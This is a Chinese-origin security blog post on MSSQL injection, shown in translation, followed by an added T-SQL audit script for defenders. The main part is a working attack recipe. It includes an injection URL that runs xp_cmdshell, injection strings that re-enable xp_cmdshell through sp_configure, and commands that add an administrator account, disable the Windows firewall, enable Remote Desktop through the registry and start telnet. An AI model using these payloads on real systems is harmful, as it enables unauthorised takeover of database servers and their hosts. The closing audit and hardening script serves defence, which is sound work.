• Dropping and restoring extended stored procedures in MSSQL injection


    Drop:

    use master
    exec sp_dropextendedproc 'xp_cmdshell'
    exec sp_dropextendedproc 'xp_enumgroups'
    exec sp_dropextendedproc 'xp_loginconfig'
    exec sp_dropextendedproc 'xp_enumerrorlogs'
    exec sp_dropextendedproc 'xp_getfiledetails'
    exec sp_dropextendedproc 'Sp_OACreate'
    exec sp_dropextendedproc 'Sp_OADestroy'
    exec sp_dropextendedproc 'Sp_OAGetErrorInfo'
    exec sp_dropextendedproc 'Sp_OAGetProperty'
    exec sp_dropextendedproc 'Sp_OAMethod'
    exec sp_dropextendedproc 'Sp_OASetProperty'
    exec sp_dropextendedproc 'Sp_OAStop'
    exec sp_dropextendedproc 'xp_regaddmultistring'
    exec sp_dropextendedproc 'xp_regdeletekey'
    exec sp_dropextendedproc 'xp_regdeletevalue'
    exec sp_dropextendedproc 'xp_regenumvalues'
    exec sp_dropextendedproc 'xp_regremovemultistring'
    exec sp_dropextendedproc 'xp_regwrite'
    drop procedure sp_makewebtask
    go 

    Restore:

    use master
    EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
    EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
    EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
    EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
    EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
    EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'
    go 

    For an MSSQL injection running with SA privileges, the simplest way to test command execution is:

    http://test.com/chan.aspx?id1=14';EXEC xp_cmdshell 'net user perl perl6 /add'--+

    From the injection side, if the extended procedure needs to be re-enabled, it can be done like this:

    EXEC sp_configure 'show advanced options',1  -- allow advanced options to be changed
    RECONFIGURE
    EXEC sp_configure 'xp_cmdshell',1  -- enable the xp_cmdshell extended procedure
    RECONFIGURE

    Or:

    ';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

    Once the extended procedure has been restored through the injection, an administrator account can be added and 3389 enabled as follows:

    EXEC xp_cmdshell 'net user colesec pa$$w0rd /ADD'
    EXEC xp_cmdshell 'net localgroup Administrators colesec /ADD'
    EXEC xp_cmdshell 'netsh firewall set opmode disable'
    EXEC xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

    #Note:
    #If xp_cmdshell does not work, remember to use master..xp_cmdshell instead.

    #The fourth statement above is a registry operation run from the command prompt; for enabling 3389 and checking the 3389 port, see the following link:

    #Checking the 3389 port and enabling 3389 from the command prompt

    Besides xp_cmdshell there are the registry procedures:

    xp_regaddmultistring
    xp_regdeletekey //delete a key
    xp_regdeletevalue //delete a value
    xp_regenumkeys
    xp_regenumvalues //return multiple values
    xp_regread //read a key value
    xp_regremovemultistring
    xp_regwrite //write a key value
    and xp_servicecontrol and others for controlling services.
    Start the telnet service:
    exec master..xp_servicecontrol 'start', 'tlntsvr'
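    As an added defender-side check (not part of the original post): a T-SQL audit script covering the settings and procedures the post manipulates. It assumes a sysadmin connection to the instance and uses only documented catalog views plus xp_readerrorlog.

```sql
-- Added audit script (not from the original post). It checks the exact knobs the
-- post above turns: the sp_configure options, the registered extended procedures,
-- the sysadmin membership that makes the injection possible, and the error-log
-- trace left behind by sp_configure. Run it as a DBA against master.
USE master;

-- 1. Server options gating xp_cmdshell and the sp_OA* procedures.
--    value_in_use = 1 means enabled; both are 0 by default on SQL Server 2005+.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 2. Extended procedures registered as user objects (sp_addextendedproc creates
--    these; the Microsoft-shipped xp_* are system objects and normally only show
--    up in sys.all_objects). Any row here is worth explaining, since it is what
--    the "Restore" block above produces.
SELECT name, dll_name, create_date, modify_date
FROM sys.extended_procedures
ORDER BY create_date DESC;

-- 3. Logins in sysadmin. A web application login in this list is the precondition
--    for the whole technique; it should not be there.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 4. Error-log evidence: every sp_configure change writes a line such as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE
--    statement to install." Search the current log (0) for it.
EXEC xp_readerrorlog 0, 1, N'Configuration option', N'xp_cmdshell';

-- 5. Hardening: turn the options back off. This only restrains non-sysadmin
--    logins; a sysadmin can re-run the enable statements from the post at any time,
--    so the durable fix is not connecting the application as sa.
EXEC sp_configure 'show advanced options', 1;     RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;               RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;     RECONFIGURE;
```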
  • Original article: https://www.cnblogs.com/perl6/p/6835519.html